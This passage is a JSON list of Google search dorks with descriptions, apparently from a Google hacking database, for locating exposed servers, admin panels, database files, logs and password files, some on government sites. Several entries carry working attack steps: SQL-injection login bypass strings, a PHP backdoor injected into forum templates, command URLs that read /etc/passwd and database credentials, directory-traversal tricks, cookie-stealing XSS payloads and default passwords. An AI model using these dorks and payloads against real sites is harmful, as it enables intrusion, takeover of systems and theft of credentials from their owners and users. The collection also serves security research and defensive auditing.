Cruchet)\r\n\r\nThanks,\r\n\r\nLutzenfried (Cl\u00e9ment Cruchet)"}, {"dork": "inurl:/uploads/affwp-debug.log", "description": "inurl:/uploads/affwp-debug.log\r\n\r\nThank you\r\nRitesh Gohil\r\n\r\nSecurity Researcher / System Test Engineer / Network Administrato"}, {"dork": "inurl:CFIDE/adminapi", "description": "# Google Dork: inurl:CFIDE/adminapi\r\n# Date: 3/26/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:/javax.faces.resource/", "description": "# Dork: inurl:/javax.faces.resource/\r\n# Identify Java Server Faces Primefaces installations"}, {"dork": "intitle:\"GlassFish Server - Server Running\"", "description": "# Google Dork: intitle:\"GlassFish Server - Server Running\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 19/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Accueil WAMPSERVER\" intext:\"Configuration Serveur\"", "description": "# Google Dork: intitle:\"Accueil WAMPSERVER\" intext:\"Configuration Serveur\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 23/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/domcfg.nsf\" \" Web Server Configuration\"", "description": "# Google Dork: inurl:\"/domcfg.nsf\" \" Web Server Configuration\"\r\n\r\n# Various servers running Lotus Domino.\r\n\r\n# Date: 29/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Miniweb Start Page\" | \"/CSS/Miniweb.css\"", "description": "# Dork: intitle:\"Miniweb Start Page\" | \"/CSS/Miniweb.css\"\r\n\r\nCategory: Scada Servers (Product: ControlLogix ,CompactLogix) Allen-Bradle\r\nRockwell Automation\r\n\r\nAuthor: Brijesh Joshi"}, {"dork": "inurl:/Portal0000.htm", "description": "#Dork: inurl:/Portal0000.htm"}, {"dork": "intitle:\"Current Network Status\" \"Nagios\"", "description": "# Google Dork: intitle:\"Current Network Status\" \"Nagios\"\r\n\r\n# Various Nagios Status pages.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:axd inurl:/elmah.axd", "description": "# Title: Sensitive Information Disclosure\r\n# Google Dork: filetype:axd inurl:/elmah.axd\r\n# Date: 18/05/2021\r\n# Author: Prajwal Khante"}, {"dork": "\"Cisco Systems, Inc. All Rights Reserved.\" -cisco.com filetype:jsp", "description": "# Dork: \"Cisco Systems, Inc. All Rights Reserved.\" -cisco.com filetype:jsp"}, {"dork": "intitle:\"SOGo\" site:webmail.*", "description": "intitle:\"SOGo\" site:webmail.*"}, {"dork": "intitle:\"Server Backup Manager SE\"", "description": "intitle:\"Server Backup Manager SE\""}, {"dork": "inurl:\"web/database/selector\"", "description": "# Dork: inurl:\"web/database/selector\"\r\n# Find OpenERP database instances\r\n\r\n-- \r\nRegards,\r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"Test Page for the HTTP Server on Fedora\"", "description": "#Dork: intitle:\"Test Page for the HTTP Server on Fedora\""}, {"dork": "intitle:\"Icecast Streaming Media Server\"", "description": "# Dork: intitle:\"Icecast Streaming Media Server\""}, {"dork": "intitle:\"Welcome to WildFly\" intext:\"Administration Console\"", "description": "# Google Dork: intitle:\"Welcome to WildFly\" intext:\"Administration Console\"\r\n\r\n# Web Server Detection\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Index of\" site:.gov intext:\"Server at\"", "description": "# Google Dork: intitle:\"Index of\" site:.gov intext:\u201dServer at\u201d\r\n\r\n# Web Server Detection\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Aftab Alam\r\n\r\nDescription: This Dork shows all \u201cIndex of\u201d pages with server information of government web servers that have \u201c.gov\u201d in their URLs."}, {"dork": "intitle:\"Welcome\" intext:\"LiteSpeed Technologies, Inc. All Rights Reserved.\"", "description": "# Google Dork: intitle:\"Welcome\" intext:\"LiteSpeed Technologies, Inc. All Rights Reserved.\"\r\n\r\n# Web Server Detection\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"web server login\" intext:\"site ip\"", "description": "# Google Dork: intitle:\"web server login\" intext:\"site ip\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl: /ftp intitle:\"office\"", "description": "# Google Dork: inurl: /ftp intitle:\"office\"\r\n# Web Server Detection\r\n# Date: 11/09/2021 \r\n# Exploit Author: Lawrence March"}, {"dork": "intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"", "description": "# Google Dork: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"\r\n# Web Server Detection\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"nPerfServer\"", "description": "# Google Dork: intitle:\"nPerfServer\"\r\n# Web Server Detection\r\n# Date: 07/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Domain Default page\" \"Parallels IP Holdings GmbH\"", "description": "# Google Dork: intitle:\"Domain Default page\" \"Parallels IP Holdings GmbH\"\r\n# Web Server Detection\r\n# Date: 23/06/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" \"/homedir/etc/\"", "description": "# Google Dork: intitle:\"index of\" \"/homedir/etc/\"\r\n# Web Server Detection\r\n# Date: 14/08/2021 \r\n# Exploit Author: Chahine Boutighane"}, {"dork": "intitle:\"index of\" AND inurl:magento AND inurl:/dev", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Web Server Detection\r\n# Date: 16/08/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "\"Wowza Streaming Engine 4 Developer Edition\"", "description": "# Google Dork: \"Wowza Streaming Engine 4 Developer Edition\"\r\n# Web Server Detection\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" site:.gov.in", "description": "# Google Dork: intitle:\"index of\" site:.gov.in\r\n# Web Server Detection\r\n# Date: 21/09/2021 \r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:\"WATASHI SERVICE\"", "description": "# Google Dork: intitle:\"WATASHI SERVICE\"\r\n# Web Server Detetion\r\n# Date: 17/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Success!\" intext:\"Your new web server is ready to use.\"", "description": "# Google Dork: intitle:\"Success!\" intext:\"Your new web server is ready to use.\"\r\n# Web Server Detection\r\n# Date:01/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Welcome to OpenResty!\"", "description": "# Google Dork: intitle:\"Welcome to OpenResty!\"\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Shoutcast server\" inurl:\"/index.html\" \"SHOUTcast Server\"", "description": "# Google Dork: intitle:\"Shoutcast server\" inurl:\"/index.html\" \"SHOUTcast Server\"\r\n# Web Server Detection\r\n# Date: 04/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\"NTRIP Caster Table Contents\" \"This is a SNIP NTRIP Caster\"", "description": "# Google Dork: \"NTRIP Caster Table Contents\" \"This is a SNIP NTRIP Caster\"\r\n# Web Server Detection\r\n# Date: 15/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/app/kibana#\"", "description": "# Google Dork: inurl:\"/app/kibana#\"\r\n# Web Server Detection\r\n# Date: 21/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "Fwd: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"", "description": "# Google Dork: Fwd: intitle:\"STEP by STIBO Systems\" \"Launch STEPworkbench\" \"Web UI Component Report\"\r\n# Web Server Detection\r\n# Date:10/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "site:*/*.asp", "description": "# Google Dork: site:*/*.asp\r\n# Web Server Detection\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl *:8080/login.php", "description": "# Google Dork: inurl *:8080/login.php\r\n# Web Server Detection\r\n# Date: 05/11/2021 \r\n# Exploit Author: Vivek Pancholi"}, {"dork": "site:vps-*.vps.ovh.net", "description": "# Dork: site:vps-*.vps.ovh.net\r\n# Author: Chahine Boutighane"}], "Vulnerable Files": [{"dork": "\"File Upload Manager v1.3\" \"rename to\"", "description": "thepeak file upload manager let you manage your webtree with up and downloading files."}, {"dork": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "description": "WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins."}, {"dork": "inurl:cgi-bin inurl:bigate.cgi", "description": "Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work."}, {"dork": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\"", "description": "sSHTerm Applet en SSHVnc Applet pages."}, {"dork": "filetype:mdb \"standard jet\" (password | username | user | pass)", "description": "These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data."}, {"dork": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "description": "this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\" a note: sometimes you don't see a link to a list of uploaded files... just switch to http://[target]/[path]/updown.php?action=download"}, {"dork": "inurl:\"simplenews/admin\"", "description": "hxxp://evuln.com/vulns/94/summary.html"}, {"dork": "TOO MANY", "description": "Click on any of the following links to show google's list!\r\n - _vti_inf.html (694 hits)\r\n - service.pwd (11,800 hits)\r\n - users.pwd (23 hits)\r\n - authors.pwd (22 hits)\r\n - administrators.pwd (22 hits)\r\n - shtml.dll (780 hits)\r\n - shtml.exe (761 hits)\r\n - fpcount.exe (1,370 hits)\r\n - default.asp (2,170 hits)\r\n - showcode.asp (4 hits)\r\n - sendmail.cfm (5 hits)\r\n - getFile.cfm (7 hits)\r\n - imagemap.exe (510 hits)\r\n - test.bat (353 hits)\r\n - msadcs.dll (8 hits)\r\n - htimage.exe (513 hits)\r\n - counter.exe (164 hits)\r\n - browser.inc (11 hits)\r\n - hello.bat (18 hits)\r\n - default.asp\\ (2,170 hits)\r\n - dvwssr.dll (571 hits)\r\n - dvwssr.dll (571 hits)\r\n - dvwssr.dll (571 hits)\r\n - cart32.exe (9 hits)\r\n - add.exe (38 hits)\r\n - index.JSP (998 hits)\r\n - index.jsp (998 hits)\r\n - SessionServlet (46 hits)\r\n - shtml.dll (780 hits)\r\n - index.cfm (473 hits)\r\n - page.cfm (5 hits)\r\n - shtml.exe (761 hits)\r\n - web_store.cgi (16 hits)\r\n - shop.cgi (63 hits)\r\n - upload.asp (27 hits)\r\n - default.asp (2,170 hits)\r\n - pbserver.dll (6 hits)\r\n - phf (370 hits)\r\n - test-cgi (1,560 hits)\r\n - finger (23,900 hits)\r\n - Count.cgi (8,710 hits)\r\n - jj (5,600 hits)\r\n - php.cgi (170 hits)\r\n - php (48,000 hits)\r\n - nph-test-cgi (132 hits)\r\n - handler (9,220 hits)\r\n - webdist.cgi (35 hits)\r\n - webgais (37 hits)\r\n - websendmail (12 hits)\r\n - faxsurvey (27 hits)\r\n - htmlscript (50 hits)\r\n - perl.exe (340 hits)\r\n - wwwboard.pl (455 hits)\r\n - www-sql (26,500 hits)\r\n - view-source (641 hits)\r\n - campas (94 hits)\r\n - aglimpse (12 hits)\r\n - glimpse (4,530 hits)\r\n - man.sh (127 hits)\r\n - AT-admin.cgi (789 hits)\r\n - AT-generate.cgi (14 hits)\r\n - filemail.pl (5 hits)\r\n - maillist.pl (16 hits)\r\n - info2www (737 hits)\r\n - files.pl (267 hits)\r\n - bnbform.cgi (91 hits)\r\n - survey.cgi (93 hits)\r\n - classifieds.cgi (25 hits)\r\n - wrap (14,000 hits)\r\n - cgiwrap (1,270 hits)\r\n - edit.pl (114 hits)\r\n - perl (80,700 hits)\r\n - names.nsf (12 hits)\r\n - webgais (37 hits)\r\n - dumpenv.pl (7 hits)\r\n - test.cgi (1,560 hits)\r\n - submit.cgi (79 hits)\r\n - submit.cgi (79 hits)\r\n - guestbook.cgi (528 hits)\r\n - guestbook.pl (451 hits)\r\n - cachemgr.cgi (25 hits)\r\n - responder.cgi (4 hits)\r\n - perlshop.cgi (30 hits)\r\n - query (15,500 hits)\r\n - w3-msql (877 hits)\r\n - plusmail (12 hits)\r\n - htsearch (177 hits)\r\n - infosrch.cgi (19 hits)\r\n - publisher (2,610 hits)\r\n - ultraboard.cgi (24 hits)\r\n - db.cgi (96 hits)\r\n - formmail.cgi (420 hits)\r\n - allmanage.pl (5 hits)\r\n - ssi (9,550 hits)\r\n - adpassword.txt (39 hits)\r\n - redirect.cgi (60 hits)\r\n - f (124,000 hits)\r\n - cvsweb.cgi (78 hits)\r\n - login.jsp (241 hits)\r\n - login.jsp (241 hits)\r\n - dbconnect.inc (18 hits)\r\n - admin (57,000 hits)\r\n - htgrep (30 hits)\r\n - wais.pl (133 hits)\r\n - amadmin.pl (14 hits)\r\n - subscribe.pl (65 hits)\r\n - news.cgi (387 hits)\r\n - auctionweaver.pl (2 hits)\r\n - .htpasswd (2,390 hits)\r\n - acid_main.php (3 hits)\r\n - access_log (1,250 hits)\r\n - access-log (618 hits)\r\n - access.log (618 hits)\r\n - log.htm (386 hits)\r\n - log.html (1,310 hits)\r\n - log.txt (987 hits)\r\n - logfile (23,200 hits)\r\n - logfile.htm (76 hits)\r\n - logfile.html (671 hits)\r\n - logfile.txt (701 hits)\r\n - logger.html (37 hits)\r\n - stat.htm (398 hits)\r\n - stats.htm (687 hits)\r\n - stats.html (1,840 hits)\r\n - stats.txt (342 hits)\r\n - webaccess.htm (11 hits)\r\n - wwwstats.html (80 hits)\r\n - source.asp (11 hits)\r\n - perl (80,700 hits)\r\n - mailto.cgi (46 hits)\r\n - YaBB.pl (35 hits)\r\n - mailform.pl (670 hits)\r\n - cached_feed.cgi (6 hits)\r\n - cr (27,500 hits)\r\n - global.cgi (14 hits)\r\n - Search.pl (548 hits)\r\n - build.cgi (74 hits)\r\n - common.php (184 hits)\r\n - common.php (184 hits)\r\n - show (33,500 hits)\r\n - global.inc (114 hits)\r\n - ad.cgi (21 hits)\r\n - WSFTP.LOG (11 hits)\r\n - index.html~ (81,100 hits)\r\n - index.php~ (6,740 hits)\r\n - index.html.bak (690 hits)\r\n - index.php.bak (69 hits)\r\n - print.cgi (61 hits)\r\n - register.cgi (172 hits)\r\n - webdriver (35 hits)\r\n - bbs_forum.cgi (45 hits)\r\n - mysql.class (21 hits)\r\n - sendmail.inc (97 hits)\r\n - CrazyWWWBoard.cgi (68 hits)\r\n - search.pl (548 hits)\r\n - way-board.cgi (44 hits)\r\n - webpage.cgi (89 hits)\r\n - pwd.dat (22 hits)\r\n - adcycle (12 hits)\r\n - post-query (240 hits)\r\n - help.cgi (69 hits)"}, {"dork": "intitle:\"Index of /\" modified php.exe", "description": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\""}, {"dork": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "description": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?)."}, {"dork": "filetype:cnf my.cnf -cvs -example", "description": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates)."}, {"dork": "filetype:wsdl wsdl", "description": "The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff."}, {"dork": "filetype:inc inc intext:setcookie", "description": "Cookies are often used for authentication and a lot of other stuff.The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining."}, {"dork": "ext:cgi inurl:ubb6_test.cgi", "description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This is the UBB6 Permissions & Paths Diagnostic Script.Example:UBB Version \t6.1.0.3 Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available \tversion 2.1 \t\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2001 Infopop Corporation All Rights Reserved"}, {"dork": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)", "description": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them)."}, {"dork": "inurl:robpoll.cgi filetype:cgi", "description": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'. All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin like this: \"http://www.example.com/robpoll.cgi?admin\"."}, {"dork": "inurl:\"plog/register.php\"", "description": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/"}, {"dork": "link:http://www.toastforums.com/", "description": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual)."}, {"dork": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", "description": "Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well."}, {"dork": "intitle:gallery inurl:setup \"Gallery configuration\"", "description": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)"}, {"dork": "\"create the Super User\" \"now by clicking here\"", "description": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\""}, {"dork": "filetype:lit lit (books|ebooks)", "description": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)"}, {"dork": "inurl:cgi.asx?StoreID", "description": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet."}, {"dork": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "description": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum."}, {"dork": "inurl:changepassword.cgi -cvs", "description": "Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force."}, {"dork": "intitle:\"Directory Listing\" \"tree view\"", "description": "Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists files and directories in either a Tree, Detailed, or Tiled view. *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path. *Displays file and directory properties. *Can specify directories which you do not want to display and access. *Can specify directories which you only want to display and access. *Can specify what file-types to only display. *Displays custom file-type icons. This can be turned off in the settings. * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings."}, {"dork": "intitle:mywebftp \"Please enter your password\"", "description": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable."}, {"dork": "ezBOO \"Administrator Panel\" -cvs", "description": "ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access monitoring on several sites. Based on php and mySQL it is easy to install and customization is made easy. It works on Unix, Linux and Windows"}, {"dork": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "description": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS."}, {"dork": "intitle:\"phpremoteview\" filetype:php \"Name, Size,", "description": "phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)"}, {"dork": "inurl:click.php intext:PHPClickLog", "description": "A script written in PHP 4 which logs a user's statistics when they click on a link. The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section."}, {"dork": "\"powered by YellDL\"", "description": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\""}, {"dork": "filetype:cgi inurl:cachemgr.cgi", "description": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established."}, {"dork": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugall", "description": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html"}, {"dork": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "description": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb"}, {"dork": "\"Powered by Land Down Under 601\"", "description": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google."}, {"dork": "inurl:php.exe filetype:exe -example.com", "description": "It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)"}, {"dork": "filetype:mdb inurl:\"news/news\"", "description": "Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected."}, {"dork": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "description": "Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt"}, {"dork": "\"Powered by Gravity Board\"", "description": "4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=\">alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory"}, {"dork": "\"Powered by SilverNews\"", "description": "silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -> Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template"}, {"dork": "PHPFreeNews inurl:Admin.php", "description": "29/07/2005 8.36.03PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=\")}//-->alert(document.cookie)also a user 